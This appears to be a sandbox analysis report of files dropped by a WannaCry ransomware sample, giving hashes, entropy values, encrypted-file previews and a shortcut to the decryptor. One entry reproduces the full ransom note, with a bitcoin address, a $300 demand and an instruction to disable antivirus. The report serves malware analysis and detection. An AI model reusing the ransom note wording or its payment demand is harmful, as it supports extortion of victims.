                                Preview:WANACRY!.......g.4.?.'.0...aO.. ..;.XE`x..&C,Y._..*g...(x.l-.z.......y!..h.mr.;...X.:bI.].E..<......A.].g..$JJ..L.......>..@(o........8sW.......v.......!.}.E..E\...|w.BM...#`..n.k....:.:r.-...g.G...:. .&..".]&..L...Vm.}g...ha,.h..Ps.b..W.DLz..e..&P.................L...a.}.j.u5g..|..T._.......fD2y.A 5.4Qk."...56.*..H........i..^.......C...*..m.|..8...$rJ).-...Q+ .....L.........>.H..........x)#/E...2.....L ..WC.<..C..kIw......5..m5....%JMA....b,"..'w8|d>.5....4.....m.........4^d..)3y..o.c.........m. a..i..(........b..3Q.,.S.B.8..t.CB8r+S.......j>F...~...]a.yq....~H.........f....(...s.%....f...,x...6...1.....~..D]......m..B..6\(..yC......wP:..vt..X..|....8.g(.V..\9j..S.!...)w:.iUX.2..../.....xQ..{............]....../`....E.@YQ..T........5....bi../.3\]..Mz.']y.#'..R....X.?..Y...........dhi.J.\S.zP...Q)..h..3...'....].X".G..O.}..Z/.Kt 6....]!.~.......n.Z.qQ.9.3I.. qD.................`...' F.48K"....c..cw.=....Z.......q....k9.......)|P.55t
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8422718049087745
                                Encrypted:false
                                SSDEEP:24:bkq3nby5zbBC2itcclHD85GaV1dH0q06U85+Qo1/1Ck3MCt+PQkIxTv8SqROFUJ:bkabytw228GabdH0q5+QMjoKxTv8REFG
                                MD5:F0682F3B25DD0D8BC9D6E136E061A1DD
                                SHA1:FDB9DA6A01C6405036694AE9B2FBF8ACBF3AFD67
                                SHA-256:F0C299A4C04A469EF66B390240428C7DC7F25606FCA13836BB7259E5E88D3F23
                                SHA-512:1F77662A260F4FDC4550A3C9E2A35F763BEDE1D161C488CC5DE997969CBE912355B9B3F4FBC472EA65E85973A50F67CA37F22391646D90CBC99D84C30CB478E5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......g.4.?.'.0...aO.. ..;.XE`x..&C,Y._..*g...(x.l-.z.......y!..h.mr.;...X.:bI.].E..<......A.].g..$JJ..L.......>..@(o........8sW.......v.......!.}.E..E\...|w.BM...#`..n.k....:.:r.-...g.G...:. .&..".]&..L...Vm.}g...ha,.h..Ps.b..W.DLz..e..&P.................L...a.}.j.u5g..|..T._.......fD2y.A 5.4Qk."...56.*..H........i..^.......C...*..m.|..8...$rJ).-...Q+ .....L.........>.H..........x)#/E...2.....L ..WC.<..C..kIw......5..m5....%JMA....b,"..'w8|d>.5....4.....m.........4^d..)3y..o.c.........m. a..i..(........b..3Q.,.S.B.8..t.CB8r+S.......j>F...~...]a.yq....~H.........f....(...s.%....f...,x...6...1.....~..D]......m..B..6\(..yC......wP:..vt..X..|....8.g(.V..\9j..S.!...)w:.iUX.2..../.....xQ..{............]....../`....E.@YQ..T........5....bi../.3\]..Mz.']y.#'..R....X.?..Y...........dhi.J.\S.zP...Q)..h..3...'....].X".G..O.}..Z/.Kt 6....]!.~.......n.Z.qQ.9.3I.. qD.................`...' F.48K"....c..cw.=....Z.......q....k9.......)|P.55t
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):933
                                Entropy (8bit):4.708686542546707
                                Encrypted:false
                                SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.805870365285327
                                Encrypted:false
                                SSDEEP:24:oNHdJZJeZTrA3iFrxE8ZddkmMGTB/X6sep9bFAH2Rdif:oNHDZJehYExE8ZddkmMGTB/83+f
                                MD5:7745D67B7C22803C81ED9D8E812A8B01
                                SHA1:F52AE856058EF970BE5919116720631B9328B4EA
                                SHA-256:10EF5F117AD7BC31B19567BC638C688A731826CFFFFEDCD60C1121CAD326B92B
                                SHA-512:B143E08127E9258A4AFA0316CF255DAABAD28BD84423E64A7158A742B45269D5E22EF3C002C83855140764592B1FDBA588C751CCEFAD34347FB876D687279A73
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839359993793439
                                Encrypted:false
                                SSDEEP:24:bkzvCmrjWuzuYlY2b4WDf8JQnxm64NPGnFYN13MVFLxoV9SxSKYJ7wWrG4/:bkrC4yuzDlY843JQxH4dGOvGLcSxIwWZ
                                MD5:48A4E9DD54C67021E7C0D7A68B715840
                                SHA1:C55AB9A2CD92A6B3D7A6C0C469230921E68748C3
                                SHA-256:80AE052C737359EF2E7657E64CACC3A46D0B245DD39577B13060095E6E3CDD60
                                SHA-512:CA5D223C3777C07561CC3E3D148CFF38F09BE211498B9BFD5E4BB3CF5182B327DDAE1951AB82A136A9071AA53A23E960A30D89D719E3872F26A970DD9BB3B9B1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....g|HH...V...ms5.h .r}.....g....'.y.Q...U...!.Ra(..Bwe..w.....?<]...{|b...u8@..(....$..............s...z..b.2...SA.<f.6..RV...H...V.3....M=..:..y.;.{. ,.\.m......x....C.N.AY...%....C......lN......x.....b.L6..n.f.m...r`..d.N.lx..u...s..nTS........$............V....!....&T.g#o..MR.J7T...z'"1&.;..@.C..ZF.C....Zw8...$....$c"g..x......).r...n......JY.'.........J..}/.;........".94........R..V$..\...o...'.SW..=.......u.*.^....#(h....v.....$..z..Q.[....O...{..n......O..,.%9t.....#.r....U.T..;.}...<#..:....p.?.3..WP...{...|9<....+6..8.;....Q....v.2. ..^q......A'....]..... ..(..X.H7..'..}-...Z..M.......Y.......w.+s..to..pQ.|S._.....+...U/.}C4...c1}[..h..)b..........1.3..@.X[#..{.P....,Z...^..H.........0#\y.w.|..o.r.....z.hD.s.a..R.I0a...s...%g..#..u...T.r..q.W......L.'..t..E......0\f@...f...l.D..t....QT.L.....@I.vb.1.e.0.&....Xe-AE.$.M].:.-.....0.m\Xi......e.v....'j`....Y7x.....e.<.k.`.-N.C.2N..8.."#....=Yb..J..Uj{...6..k.....(....|...W..g.8].
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.839359993793439
                                Encrypted:false
                                SSDEEP:24:bkzvCmrjWuzuYlY2b4WDf8JQnxm64NPGnFYN13MVFLxoV9SxSKYJ7wWrG4/:bkrC4yuzDlY843JQxH4dGOvGLcSxIwWZ
                                MD5:48A4E9DD54C67021E7C0D7A68B715840
                                SHA1:C55AB9A2CD92A6B3D7A6C0C469230921E68748C3
                                SHA-256:80AE052C737359EF2E7657E64CACC3A46D0B245DD39577B13060095E6E3CDD60
                                SHA-512:CA5D223C3777C07561CC3E3D148CFF38F09BE211498B9BFD5E4BB3CF5182B327DDAE1951AB82A136A9071AA53A23E960A30D89D719E3872F26A970DD9BB3B9B1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....g|HH...V...ms5.h .r}.....g....'.y.Q...U...!.Ra(..Bwe..w.....?<]...{|b...u8@..(....$..............s...z..b.2...SA.<f.6..RV...H...V.3....M=..:..y.;.{. ,.\.m......x....C.N.AY...%....C......lN......x.....b.L6..n.f.m...r`..d.N.lx..u...s..nTS........$............V....!....&T.g#o..MR.J7T...z'"1&.;..@.C..ZF.C....Zw8...$....$c"g..x......).r...n......JY.'.........J..}/.;........".94........R..V$..\...o...'.SW..=.......u.*.^....#(h....v.....$..z..Q.[....O...{..n......O..,.%9t.....#.r....U.T..;.}...<#..:....p.?.3..WP...{...|9<....+6..8.;....Q....v.2. ..^q......A'....]..... ..(..X.H7..'..}-...Z..M.......Y.......w.+s..to..pQ.|S._.....+...U/.}C4...c1}[..h..)b..........1.3..@.X[#..{.P....,Z...^..H.........0#\y.w.|..o.r.....z.hD.s.a..R.I0a...s...%g..#..u...T.r..q.W......L.'..t..E......0\f@...f...l.D..t....QT.L.....@I.vb.1.e.0.&....Xe-AE.$.M].:.-.....0.m\Xi......e.v....'j`....Y7x.....e.<.k.`.-N.C.2N..8.."#....=Yb..J..Uj{...6..k.....(....|...W..g.8].
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.813557426328387
                                Encrypted:false
                                SSDEEP:24:H1SQU2lKhKYz575uZTzdtYkeXFL3jiqBkrVS:H1SQU2l0KYz5stzvBy9184
                                MD5:D2D36C971D3B8F559DEC6B2ECCBD0076
                                SHA1:C6F5E5C674BC3DEB20E788C476BAB9DF23E12080
                                SHA-256:8173A49907225F5D34F233F0C84ACD10195A1FDAD318E4E7365C0343D2627FF7
                                SHA-512:850686B68ACE86F35D041065F222FCD8EB31EF39865E22D185FDB9102AA086C76E38C32C9FBB35A4D04BE10CE6018B1AB39091D8B5D5F8DBD8272F458E4E9EC2
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854305026526188
                                Encrypted:false
                                SSDEEP:24:bkeFa9Dw6b/h9gtdfL6XwT/43/mYDjtJX8iz3NHlfIGhpWbC9BbGFm0HFblBo4LX:bkZA/6Y4/NVJX8gHllWb8BAv
                                MD5:D1D542B35EA12D2355B75F9CE3DEBBDB
                                SHA1:1CE0BA937D3BA2588482DC0A71891282AEABC1D9
                                SHA-256:FE4143971E95A209F7AC0E507EE71D0E818DBF7D3432CCB15FE1024C8EDFD7AD
                                SHA-512:74CA5C9504C2FD17A214F48296DCD6C4EE42651073CA3E098E55B55D0706555A60262633340AD2D93E3438032ADB1D6C774DF71FE309802F0258C45A47136289
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....=..|..9C.=...v.Z7..7.D../\.`P..>.5{gG..+....'2...lk+v.../\..nI/P2../.....Ud..}.<..|.Y.If..dY..Y.s..]x..8!..Hc(.M# ....[v.P....$a....>l{../.'...^$.n9.....J.>.....]..&.{kp.M.AaWE..-].Y...S$...aP../].._..6..".q......pS.Q...cy.2.....\,..+..Y.%<.)..@N..t'............. h..#Nhc.....U,._........D...pWE6.9N.D[..|TF..O.y...c.t.I.%.....F.H..kz..R,2..b.Jz.o.{xj_-..h.Qz..^j[.r.Oj..(.i..........'f.E.aY.E.X.....b....TS..J...=H..p..:.[......fv'#]^.........n\Bg.....H!...z..1...*.d>..I..go.........S.D....g.u.._tZ......5-.T.B...0a.....k4.j.....^..._s.o0~....x....^.:..<..........*..;% $........z.....f.s...%"..G.\..T...vu..v+..C..o.Y.1n..G......7......V..m.2.l;.p...M..5?..!...i.s.9...*........R....N........v.E..:.B.\."Y.x%6...E..@..`mc..O..'v...h.V.$.)'...|...\p..s.-LI^h.1.(8L.!1.....!....:.K..N.;..k&......C..u...i.d.Z.J.B@...8..>.f../.....;.zr.IW..Ul.0.}/......JH.[..>..h.....Y.....8..r.G..M...V.X..2......Y....(Bd{....t:.oK......~i.l..b...K._^.d.E5].9M.
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.854305026526188
                                Encrypted:false
                                SSDEEP:24:bkeFa9Dw6b/h9gtdfL6XwT/43/mYDjtJX8iz3NHlfIGhpWbC9BbGFm0HFblBo4LX:bkZA/6Y4/NVJX8gHllWb8BAv
                                MD5:D1D542B35EA12D2355B75F9CE3DEBBDB
                                SHA1:1CE0BA937D3BA2588482DC0A71891282AEABC1D9
                                SHA-256:FE4143971E95A209F7AC0E507EE71D0E818DBF7D3432CCB15FE1024C8EDFD7AD
                                SHA-512:74CA5C9504C2FD17A214F48296DCD6C4EE42651073CA3E098E55B55D0706555A60262633340AD2D93E3438032ADB1D6C774DF71FE309802F0258C45A47136289
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....=..|..9C.=...v.Z7..7.D../\.`P..>.5{gG..+....'2...lk+v.../\..nI/P2../.....Ud..}.<..|.Y.If..dY..Y.s..]x..8!..Hc(.M# ....[v.P....$a....>l{../.'...^$.n9.....J.>.....]..&.{kp.M.AaWE..-].Y...S$...aP../].._..6..".q......pS.Q...cy.2.....\,..+..Y.%<.)..@N..t'............. h..#Nhc.....U,._........D...pWE6.9N.D[..|TF..O.y...c.t.I.%.....F.H..kz..R,2..b.Jz.o.{xj_-..h.Qz..^j[.r.Oj..(.i..........'f.E.aY.E.X.....b....TS..J...=H..p..:.[......fv'#]^.........n\Bg.....H!...z..1...*.d>..I..go.........S.D....g.u.._tZ......5-.T.B...0a.....k4.j.....^..._s.o0~....x....^.:..<..........*..;% $........z.....f.s...%"..G.\..T...vu..v+..C..o.Y.1n..G......7......V..m.2.l;.p...M..5?..!...i.s.9...*........R....N........v.E..:.B.\."Y.x%6...E..@..`mc..O..'v...h.V.$.)'...|...\p..s.-LI^h.1.(8L.!1.....!....:.K..N.;..k&......C..u...i.d.Z.J.B@...8..>.f../.....;.zr.IW..Ul.0.}/......JH.[..>..h.....Y.....8..r.G..M...V.X..2......Y....(Bd{....t:.oK......~i.l..b...K._^.d.E5].9M.
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820497177347472
                                Encrypted:false
                                SSDEEP:24:Auzxri7UdDOds48v6690d1TMMAomuk94hp/BrSqv:AgxcUdDOds48v6H1QMAak94hp/sk
                                MD5:E26B4BE7CDC6F8B85DC2F594A4504D3E
                                SHA1:8146317FC26D09C9A6B38BD4A7EE71D7CDD7BDB6
                                SHA-256:15B1BF1FC57F53094DB35509DB8EFDEC15A61C11D8A914118317A36B08DA8E8E
                                SHA-512:CC75E1F4B5B1179690F452DEFEAF7950B52CDC61DF10F619BB2A9095469EDB6DE6F993046756AC77DB0446CBAE70ACB2DC96572EFEB39DC17EEF1F9EC5E16BC9
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849833813047626
                                Encrypted:false
                                SSDEEP:24:bk49pFiB/UH9Z4zMW4Zh2FC0QIv3VaSb9RsYpEOH7Wr3eOJPNJT:bkpcbmM32FvflNREOH71OJFx
                                MD5:898C716AB426298E8663BDBAE1FCF006
                                SHA1:820A7F0EB70E948C06A6956BFFE9A7F4C2AAC660
                                SHA-256:D3657FD636373561753C1CFEB4EEF9FDC704A8EAEACB457109461C751B3E0C59
                                SHA-512:BD38AB10E23C4C6EE7EA408343466D0310F9E4CDD8EB1890EFFA840EA543E6994B4E7161E8F0180A1273DC94FAB884768775DCB42251C7DBD61E9B27F2B4542F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........=.L!F......A..VC.;_....2...|_MK.Z."as.......u+..C..-.F.#............t.q.9..M."./i.......f.;.*..s"a....t.I)..O....O..#2S..`w..........}.m...TZk.7...T. ...Az..V....Y.2],..L..W%..%...b.......B...RI.;.N..L........c.0._.i.@..!..v...we.jZ.,G...A6=....................;h..[.a..B.\.{...Ac.b..3.E..>....S..r.2AC.VZ....o....&{. .0\.....(.....b..j....z...B..rRh6.\%b:.id..v.#......b.~`.,a....A..^A..Js.3....qp..F.m`.Io.%..#.G.M..>p]85).+.3{...<.....#.........a^y..eL:.pO.*g P...w.F..i'5..:9S5.FD.../?.t.'..x....dn..KU...P..Zv._DR...~..L6R..=v.......}..pn..N.T1n....}._..H..m.Y.U^%.s..j...... .......eG.5,.&_..z...*z.5l.~.M.F].32.#..{.*...C.c..Q.V#......q..1i.....|\&.m.D.mH.MB\....o..].hj.:...^0.{...Ia.KT.....#.IcQ. x...(...6.B...*%.....MCg)^6Ar(|.. )>..y...}C.x<..!k..:....l.....9.^.!"^YY8P*......_.+....v.f...J;7wA.......=....O.L.f.....\.".G#<..>.r......[.M..F....z{.1..T.7....DT..X9...1...6..O8.=.6Og3u-`&...yY.IbOx...w.@..M...XJ9j."EW.h*X.-....E.."6
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849833813047626
                                Encrypted:false
                                SSDEEP:24:bk49pFiB/UH9Z4zMW4Zh2FC0QIv3VaSb9RsYpEOH7Wr3eOJPNJT:bkpcbmM32FvflNREOH71OJFx
                                MD5:898C716AB426298E8663BDBAE1FCF006
                                SHA1:820A7F0EB70E948C06A6956BFFE9A7F4C2AAC660
                                SHA-256:D3657FD636373561753C1CFEB4EEF9FDC704A8EAEACB457109461C751B3E0C59
                                SHA-512:BD38AB10E23C4C6EE7EA408343466D0310F9E4CDD8EB1890EFFA840EA543E6994B4E7161E8F0180A1273DC94FAB884768775DCB42251C7DBD61E9B27F2B4542F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........=.L!F......A..VC.;_....2...|_MK.Z."as.......u+..C..-.F.#............t.q.9..M."./i.......f.;.*..s"a....t.I)..O....O..#2S..`w..........}.m...TZk.7...T. ...Az..V....Y.2],..L..W%..%...b.......B...RI.;.N..L........c.0._.i.@..!..v...we.jZ.,G...A6=....................;h..[.a..B.\.{...Ac.b..3.E..>....S..r.2AC.VZ....o....&{. .0\.....(.....b..j....z...B..rRh6.\%b:.id..v.#......b.~`.,a....A..^A..Js.3....qp..F.m`.Io.%..#.G.M..>p]85).+.3{...<.....#.........a^y..eL:.pO.*g P...w.F..i'5..:9S5.FD.../?.t.'..x....dn..KU...P..Zv._DR...~..L6R..=v.......}..pn..N.T1n....}._..H..m.Y.U^%.s..j...... .......eG.5,.&_..z...*z.5l.~.M.F].32.#..{.*...C.c..Q.V#......q..1i.....|\&.m.D.mH.MB\....o..].hj.:...^0.{...Ia.KT.....#.IcQ. x...(...6.B...*%.....MCg)^6Ar(|.. )>..y...}C.x<..!k..:....l.....9.^.!"^YY8P*......_.+....v.f...J;7wA.......=....O.L.f.....\.".G#<..>.r......[.M..F....z{.1..T.7....DT..X9...1...6..O8.=.6Og3u-`&...yY.IbOx...w.@..M...XJ9j."EW.h*X.-....E.."6
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.849331355157396
                                Encrypted:false
                                SSDEEP:24:+ONb8+I9F2M3WJ2nldsICgnCM9ldUqLkgG:Zg+Ij2APnltCgdlWqu
                                MD5:7E96A9ECBD0492B3F17C3C370200EA99
                                SHA1:73A4447F4658926683A3F3D400F469E0E9284743
                                SHA-256:CD5EC38893D1FD1EF610DFF239578695240732787CC4590B4AA157B9198F0065
                                SHA-512:8DC961B21DEF4B5EDDAC174B632991757641D073B6094DB4892254B4D8B25289E13F77A85EFF61F34587BADCEE5138F1FAA8A00B9E827A40C5FA0C201EFC7E46
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846435683559001
                                Encrypted:false
                                SSDEEP:24:bk473hMznzq6daJjjalmRfFFIy0qglGXVUuQA5712:bk473hIzZdahjzjIQTSPc7k
                                MD5:E1CD88C3DBA88574779E4142AC7D32BE
                                SHA1:507AC95784B847D965F67CDF476ABBC42CB976D3
                                SHA-256:C50BA49EAF331C8043D20B0DE42932F022634CA5454412AD7682746C3712BBB9
                                SHA-512:B711F3C31ACD05B988B32AF9CB4F07AB09AFA1A193A8EF373C8953D0495EFA8225C5CF0ED3ACAB8172075E23CD9DFB7A5A514ED7F56E01747504CF13922FDBD3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.846435683559001
                                Encrypted:false
                                SSDEEP:24:bk473hMznzq6daJjjalmRfFFIy0qglGXVUuQA5712:bk473hIzZdahjzjIQTSPc7k
                                MD5:E1CD88C3DBA88574779E4142AC7D32BE
                                SHA1:507AC95784B847D965F67CDF476ABBC42CB976D3
                                SHA-256:C50BA49EAF331C8043D20B0DE42932F022634CA5454412AD7682746C3712BBB9
                                SHA-512:B711F3C31ACD05B988B32AF9CB4F07AB09AFA1A193A8EF373C8953D0495EFA8225C5CF0ED3ACAB8172075E23CD9DFB7A5A514ED7F56E01747504CF13922FDBD3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.812109057982506
                                Encrypted:false
                                SSDEEP:24:2PxsNWsd1S+yNQzCEcN6rY8drTxSfdS0UNQpEXpletu5fsgShn:yJ85cUrfBx3hXpB5fsgShn
                                MD5:745253C547AF98E89DED34EBDC226E1C
                                SHA1:F035B26A5A15585B3AB42961A70505710514CB08
                                SHA-256:0DFBCF28FD41281C0DCDA342E2AB82D4192A5C7744EA84FECB540F210DA74646
                                SHA-512:27141D36F5130E5D723D5CE78374F92BA1A4A7A26B2570F06E7444E1D78004031B39A94F365E9D14AF67A9A5141F5C9929A325601A569446F51F69A6F4C62ACC
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.826072455901225
                                Encrypted:false
                                SSDEEP:24:bkmH6jTHspl6ds+CSWK+xIF9BoJel8HvMQhl3ezPQL8ItgcaMf0V0Io8rrOIHvDj:bkG6Xa4dsyWZI/Bd8PWPQ7XfBv8r/bnj
                                MD5:4C9A9916D29AD69E2CDE3B539C47A238
                                SHA1:7D1E07081673BB3BA0BBC9E36FC8085E4FE5D2CA
                                SHA-256:8B0C4FE2AD5A1FBDCD1905B43ADC2EBCBFC09AA5691E56FDDF4F50C5BD37C1BE
                                SHA-512:06F0D1690EED4BC5745862416124AAF95FDFEA1326662BC6BCFFC55743FE1FFA7FB55E7CCBD1813577E2645F84B0E470C43945263091B69B5B39A640719A9BE1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.826072455901225
                                Encrypted:false
                                SSDEEP:24:bkmH6jTHspl6ds+CSWK+xIF9BoJel8HvMQhl3ezPQL8ItgcaMf0V0Io8rrOIHvDj:bkG6Xa4dsyWZI/Bd8PWPQ7XfBv8r/bnj
                                MD5:4C9A9916D29AD69E2CDE3B539C47A238
                                SHA1:7D1E07081673BB3BA0BBC9E36FC8085E4FE5D2CA
                                SHA-256:8B0C4FE2AD5A1FBDCD1905B43ADC2EBCBFC09AA5691E56FDDF4F50C5BD37C1BE
                                SHA-512:06F0D1690EED4BC5745862416124AAF95FDFEA1326662BC6BCFFC55743FE1FFA7FB55E7CCBD1813577E2645F84B0E470C43945263091B69B5B39A640719A9BE1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821676905593745
                                Encrypted:false
                                SSDEEP:24:P1E61rOM3jdTcANgcTR6i7d8zFOPTHy+3dNxFTr:dE6BOMdcGgcYi7dwFMTdRn
                                MD5:89808A2EBC2DB47BCF9D65A6E7298CE8
                                SHA1:107B582817281A2CA6EA3A36FDDE1F8A30F297D8
                                SHA-256:B8B1D173EF1D739CF9A385A193458F75C4B9237E17B78CA5D2E0693BDB630786
                                SHA-512:0F7CA80A46236FD61786790879B5CF8BB1EB6071F0A4E69D911ACC86640B63181CC53ED3255B4B9C665F97687C3A4B740D9EB17A1B167A65B4708768428AEF55
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853037328722231
                                Encrypted:false
                                SSDEEP:24:bkqbCNriHu9rj6f4o7hsM72OGxAwaWG3dqw70c1Zr7ZgGNaRpqYEMiOh1aFWLLMT:bk9NrFH6Qo7GM7nzp3dLZvBaRpjvjuWe
                                MD5:BE7C3D7947E4599A473C7DEB9E94302C
                                SHA1:48A7195C5C7D186847D6D10FF8EE2E9C9F1B9C8E
                                SHA-256:4F9BD7F0BE8EE39DC52A93BD5E6316FE1AF41D0D6913E6DBF7CE7759F5AF9DC2
                                SHA-512:9BE9F9DE2375D3A127BE51A70DAA61A00D637D2E690B39629F12E07243790E60386D4998F459931A04F0E7DFFE7F4F5FDDE025580D6429C412ABB315397709A0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.853037328722231
                                Encrypted:false
                                SSDEEP:24:bkqbCNriHu9rj6f4o7hsM72OGxAwaWG3dqw70c1Zr7ZgGNaRpqYEMiOh1aFWLLMT:bk9NrFH6Qo7GM7nzp3dLZvBaRpjvjuWe
                                MD5:BE7C3D7947E4599A473C7DEB9E94302C
                                SHA1:48A7195C5C7D186847D6D10FF8EE2E9C9F1B9C8E
                                SHA-256:4F9BD7F0BE8EE39DC52A93BD5E6316FE1AF41D0D6913E6DBF7CE7759F5AF9DC2
                                SHA-512:9BE9F9DE2375D3A127BE51A70DAA61A00D637D2E690B39629F12E07243790E60386D4998F459931A04F0E7DFFE7F4F5FDDE025580D6429C412ABB315397709A0
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):3197106
                                Entropy (8bit):6.130063064844696
                                Encrypted:false
                                SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                MD5:6ED47014C3BB259874D673FB3EAEDC85
                                SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):719217
